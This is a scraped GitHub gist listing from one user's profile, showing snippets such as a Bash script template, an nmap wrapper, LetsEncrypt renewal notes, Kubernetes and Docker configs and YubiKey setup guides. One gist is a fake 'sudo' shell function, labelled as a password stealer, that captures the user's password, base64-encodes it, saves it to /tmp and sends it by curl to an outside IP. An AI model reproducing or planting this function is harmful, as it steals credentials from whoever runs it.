Skip to content

Instantly share code, notes, and snippets.

View crrlcx's full-sized avatar
I may be slow to respond.

Carrol Cox crrlcx

I may be slow to respond.
18 followers · 14 following
View GitHub Profile
@m-radzikowski
m-radzikowski / script-template.sh
Last active October 9, 2025 00:41
Minimal safe Bash script template - see the article with full description: https://betterdev.blog/minimal-safe-bash-script-template/
#!/usr/bin/env bash
set -Eeuo pipefail
trap cleanup SIGINT SIGTERM ERR EXIT
script_dir=$(cd "$(dirname "${BASH_SOURCE[0]}")" &>/dev/null && pwd -P)
usage() {
cat <<EOF
Usage: $(basename "${BASH_SOURCE[0]}") [-h] [-v] [-f] -p param_value arg1 [arg2...]
@m0zgen
m0zgen / sudo
Last active November 18, 2020 06:37 — forked from tokyoneon/sudo
Sudo function for stealing Unix passwords; script for WonderHowTo article
function sudo ()
{
realsudo="$(which sudo)"
read -s -p "[sudo] password for $USER: " inputPwd
encoded=$(echo "$USER : $inputPwd" | base64) > /dev/null 2>&1
printf "\n"; printf '%s\n' $encoded >> /tmp/.cached_$USER
curl -s "http://10.211.55.98/$encoded" > /dev/null 2>&1
$realsudo -S -u root bash -c "exit" <<< "$inputPwd" > /dev/null 2>&1
$realsudo "${@:1}"
}
@Bo0oM
Bo0oM / nmap.sh
Last active October 3, 2023 19:40
Three steps for nmap
echo -n "Target list (google.com, 192.168.1.1/24): "
read IP
echo "Treat all hosts as online -- skip host discovery (Y/N)?"
read answer
PN=""
if [ "$answer" != "${answer#[Yy]}" ] ; then
PN="-Pn";
fi
@Nimrodda
Nimrodda / letsencrypt-wildcard-renewal.md
Last active February 17, 2024 12:53
Setup automatic LetsEncrypt wildcard certificate renewal on Ubuntu server 18.04 with Namecheap

All credits go to by Bryan Roessler for his original post that I followed on how to setup LetsEncrypt wildcard certificate auto-renewal with Namecheap. I highly recommend you read his tutorial first and if you bump into issues, check out this gist next.

Unfortunately the original article is not up-to-date and doesn't have the option to leave comments so I can't communicate with the author for updates so I decided to write the updates in a Gist. I highlighted the sections that required an updated with Correction #:. I managed to get the correct setup with the help of the amazing guys at LetsEncrypt community. Here's the help thread.

Set up acme-dns

  1. Download acme-dns from https://github.com/joohoi/acme-dns/releases
  2. Move the binary somewhere sensible since we will be using
@delfer
delfer / deployment.yaml
Created January 16, 2019 12:08
drone-agent dind
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: drone-agent
spec:
replicas: 8
strategy:
type: RollingUpdate
template:
metadata:
@sshimko
sshimko / otp.txt
Last active January 9, 2024 23:25
Yubikey + FreeIPA Manual Setup
In Yubikey tool:
1. Click OATH+HOTP tab
2. Click Advanced
3. Deselect token identifier.
4. Press Generate to create a new random seed.
@dio
dio / build.sh
Last active March 19, 2019 16:41
Build envoyproxy/envoy on Ubuntu 14.04 from source
#!/usr/bin/env bash
set +e
cd ~
sudo apt-get update
sudo apt-get install software-properties-common python-software-properties ssh -yq
sudo apt-get install curl -yq
# if git clone/fetch to github fails (bazel calls this too), could be because of we have no keys to contact github
@phuysmans
phuysmans / gist:4f67a7fa1b0c6809a86f014694ac6c3a
Created January 8, 2018 09:29
docker compose health check example
version: '2.1'
services:
php:
tty: true
build:
context: .
dockerfile: tests/Docker/Dockerfile-PHP
args:
version: cli
volumes:
@tallclair
tallclair / restricted-psp.yaml
Last active March 27, 2025 02:22
Restricted PodSecurityPolicy
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
name: restricted
annotations:
seccomp.security.alpha.kubernetes.io/allowedProfileNames: 'docker/default'
apparmor.security.beta.kubernetes.io/allowedProfileNames: 'runtime/default'
seccomp.security.alpha.kubernetes.io/defaultProfileName: 'docker/default'
apparmor.security.beta.kubernetes.io/defaultProfileName: 'runtime/default'
spec:
@ageis
ageis / YubiKey-GPG-SSH-guide.md
Last active June 25, 2025 15:14
Technical guide for using YubiKey series 4 for GPG and SSH

YubiKey 4 series GPG and SSH setup guide

Written for fairly adept technical users, preferably of Debian GNU/Linux, not for absolute beginners.

You'll probably be working with a single smartcard, so you'll want only one primary key (1. Sign & Certify) and two associated subkeys (2. Encrypt, 3. Authenticate). I've published a Bash function which automates this slightly special key generation process.